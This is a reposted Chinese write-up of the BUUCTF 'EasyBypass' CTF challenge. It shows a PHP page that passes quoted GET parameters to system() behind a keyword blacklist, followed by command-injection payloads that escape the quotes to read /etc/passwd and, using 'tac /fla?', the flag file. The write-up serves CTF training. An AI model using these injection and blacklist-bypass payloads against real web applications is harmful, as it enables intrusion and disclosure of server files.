[BUUCTF]Easybypass-解题步骤详解

admin
admin
admin
139164
文章
114
评论
2022年4月28日18:14:08评论370 views字数 931阅读3分6秒阅读模式

[BUUCTF]Easybypass-解题步骤详解EasyBypass

<?phphighlight_file(__FILE__);$comm1 = $_GET['comm1'];$comm2 = $_GET['comm2'];if(preg_match("/'|`|\|*|n|t|xA0|r|{|}|(|)|<|&[^d]|@|||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $comm1))    $comm1 = "";if(preg_match("/'|"|;|,|`|*|\|n|t|r|xA0|{|}|(|)|<|&[^d]|@|||ls|||tail|more|cat|string|bin|less||tac|sh|flag|find|grep|echo|w/is", $comm2))    $comm2 = "";$flag = "#flag in /flag";$comm1 = '"' . $comm1 . '"';$comm2 = '"' . $comm2 . '"';$cmd = "file $comm1 $comm2";system($cmd);?>

老规矩,先去掉过滤本地测试

?comm1=/etc/passwd&comm2=/var/www/html/11.php";"ls

去掉过滤后可以成功执行,那思路基本是这样了

comm1过滤的少,我们从这里下手

?comm1=index.php";tac index.php;"&comm2=1

?comm1=index.php";tac /fla?;"&comm2=1

ok了…

原文来自CSDN博主「N0Tai1学习又咕了」|侵删






[BUUCTF]Easybypass-解题步骤详解

[BUUCTF]Easybypass-解题步骤详解


中电运行是专业专注培养能源企业IT工匠和提供IT整体解决方案的服务商,也是能源互联网安全专家。

为方便大家沟通,中电运行开通“中电运行交流群”,诚挚欢迎能源企业和相关人士,以及对网络安全感兴趣的群体加入本群,真诚交流,互相学习[BUUCTF]Easybypass-解题步骤详解[BUUCTF]Easybypass-解题步骤详解。想加入我们就给我们留言吧[BUUCTF]Easybypass-解题步骤详解

[BUUCTF]Easybypass-解题步骤详解

[BUUCTF]Easybypass-解题步骤详解

小白必读!寰宇卫士手把手教你栈溢出(上)

手把手教你栈溢出(中)

手把手教你栈溢出(下)

《信息安全知识》之法律关键常识汇总

CTF经验分享|带你入门带你飞!

[BUUCTF]Easybypass-解题步骤详解

原文始发于微信公众号(寰宇卫士):[BUUCTF]Easybypass-解题步骤详解

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月28日18:14:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [BUUCTF]Easybypass-解题步骤详解https://cn-sec.com/archives/959615.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息